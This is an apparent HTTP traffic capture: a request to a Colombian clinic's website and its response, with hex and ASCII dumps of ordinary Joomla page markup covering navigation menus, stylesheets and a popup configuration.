                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                          Cookie: d55e479f054c94814cbc10d217aaa990=2bff9442b12485418e3a501b44a59acc
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17113INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:59 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Last-Modified: Wed, 05 Jul 2023 06:07:59 GMT
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dNO6WvzuOoAJWhgQG2R0ker16Eagbe%2FdIKql9AU9kQZ43RJSL8t6Wbrh4%2BauGtanzqZd4odYdP36%2BWmfa96i%2F5gri0aOrAxkRbIgEK7pMfkqvlTqPHQPNPKVx4%2B4dpciZzSo1jCfu%2Bo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6e4bca352c75-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17114INData Raw: 37 63 61 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                          Data Ascii: 7cab<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17114INData Raw: 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2d 63 6f 6d 70 69 6c 65 64 2f 6e 75 63 6c 65 75 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 72 74 5f 73 61 6c 69 65 6e 74 2f 63 75 73 74 6f
                                                                                                                                                                                                                                                                          Data Ascii: jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/users/nucleus/css-compiled/nucleus.css" rel="stylesheet" /><link href="/templates/rt_salient/custo
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17115INData Raw: 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 6a 73 2f 72 6f 6b 62 6f 78 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 6a 75 69 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31
                                                                                                                                                                                                                                                                          Data Ascii: 9da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins/system/rokbox/assets/js/rokbox.js"></script><script src="/media/jui/js/bootstrap.min.js?989da4646a1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17117INData Raw: 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 67 61 6e 74 72 79 20 73 69 74 65 20 63 6f 6d 5f 67 61 6e 74 72 79 35 20
                                                                                                                                                                                                                                                                          Data Ascii: leus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]--><link rel="shortcut icon" href="/images/favicon.png"></head><body class="gantry site com_gantry5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17118INData Raw: 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 30 34 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f
                                                                                                                                                                                                                                                                          Data Ascii: 8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g-menu-item g-menu-item-type-separator g-menu-item-104 g-parent g-standard "><div class="g-menu-item-co
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17119INData Raw: 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 65 64 69 61 74 72 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f
                                                                                                                                                                                                                                                                          Data Ascii: -item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span class="g-menu-item-content"><span class="g-menu-item-title">Pediatras</span></span></a></li><li class="g-menu-item g-menu-item-type-co
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17121INData Raw: 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 51 75 69 c3 a9 6e 65 73 20 73 6f 6d 6f 73 20 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e
                                                                                                                                                                                                                                                                          Data Ascii: i><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent> <span class="g-separator g-menu-item-content"> <span class="g-menu-item-title">Quines somos </span></span
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17122INData Raw: 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 76 61 6c 6f 72 65 73 2d 63 6f 72 70 6f 72 61 74 69 76 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e
                                                                                                                                                                                                                                                                          Data Ascii: es</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/valores-corporativos"><span class="g-menu-item-content"><span class="g-menu-item-title">
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17123INData Raw: 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 75 6d 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 73 75
                                                                                                                                                                                                                                                                          Data Ascii: le">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent></span> </a><ul class="g-dropdown g-inactive g-fade g-dropdown-right"><li class="g-dropdown-column"><div class="g-grid"><div class="g-block size-100"><ul class="g-su
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17125INData Raw: 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69 c3 b3 6e 20 79 20 70 72 6f 6d 6f 63 69 c3 b3 6e 20 70 61 72 61 20 6c 61 20 64 6f 6e 61 63 69 c3 b3 6e 20 64 65 20 c3 b3 72 67 61 6e 6f 73 20 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                          Data Ascii: entes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educacin y promocin para la donacin de rganos </span></span></a></li></ul></div></div></li></ul></li><li class="
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17126INData Raw: 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 49 6e 64 69 63 61 64 6f 72 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 39 20 20 22 3e 0a 3c 61 20 63 6c
                                                                                                                                                                                                                                                                          Data Ascii: ass="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-item-title">Indicadores</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-399 "><a cl
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17127INData Raw: 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 74 6f 72 69 6f 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 39 20 20 22 3e 0a 3c 61 20
                                                                                                                                                                                                                                                                          Data Ascii: 1 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span class="g-menu-item-title">Directorio</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-119 "><a
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17129INData Raw: 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 38 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e
                                                                                                                                                                                                                                                                          Data Ascii: st-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-component g-menu-item-388 g-standard "><a class="g-menu-item-con
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17130INData Raw: 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 3b 0d 0a 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 33 37 39 7b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 3b 2f 2a 70 6f 70 75 70 20 62 61 63 6b 67 72 6f 75 6e 64 20 63 6f 6c 6f 72 2a 2f 0d 0a 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 29 3b 2f 2a 70 6f 70 75 70 20 66 6f 6e 74 20 63 6f 6c 6f 72 2a 2f 0d 0a 62 6f 72 64
                                                                                                                                                                                                                                                                          Data Ascii: ybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity: ;}#gafancybox-skin379{background: rgba(255, 255, 255, 1);/*popup background color*/color: rgba(0, 0, 0, 0);/*popup font color*/bord
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17131INData Raw: 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 09 0d 0a 09 09 09 0d 0a 09 09 74 70 6c 3a 20 7b 0d 0a 09 09 09 09 6f 76 65 72 6c 61 79 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 22 20 69 64 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 22 3e 3c 2f 64 69 76 3e 27 2c 0d 0a 09 09 09 09 77 72 61 70 20 20 20 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 61 66 61 6e 63 79 62 6f
                                                                                                                                                                                                                                                                          Data Ascii: autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,tpl: {overlay : '<div class="gafancybox-overlay" id="gafancybox-overlay379"></div>',wrap : '<div class="gafancybo
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17133INData Raw: 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 62 6c 6f 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 3e 3c 69 6d 67 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f
                                                                                                                                                                                                                                                                          Data Ascii: p-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index.php/nuestra-clinica/nuestros-pacientes/blog" target="_blank" rel="noopener"><img style="display: block; margin-left: auto; margin-right: auto
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17134INData Raw: 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 22 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 69 74 61 2d 6d 65 64 69 63 61 22 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 20 62 75 74 74 6f 6e 2d 34 22 3e 41 67 65 6e 64 61 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a
                                                                                                                                                                                                                                                                          Data Ascii: .png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class="g-animatedblock-button"><a href="/index.php/contacto/cita-medica" class="button button-4">Agenda</a></div></div></div> </div></div></div></div>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17135INData Raw: 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 33 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 31 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 33 2f 50 61 67 69 6e 61 5f 57 65 62 5f 31 2d 30 31 2e 6a 70 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c
                                                                                                                                                                                                                                                                          Data Ascii: "g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="g-animatedblock-animated g-bg-3 g-animatedblock-animation-1"><img src="/images/2023/Pagina_Web_1-01.jpg" alt="image" /><div cl
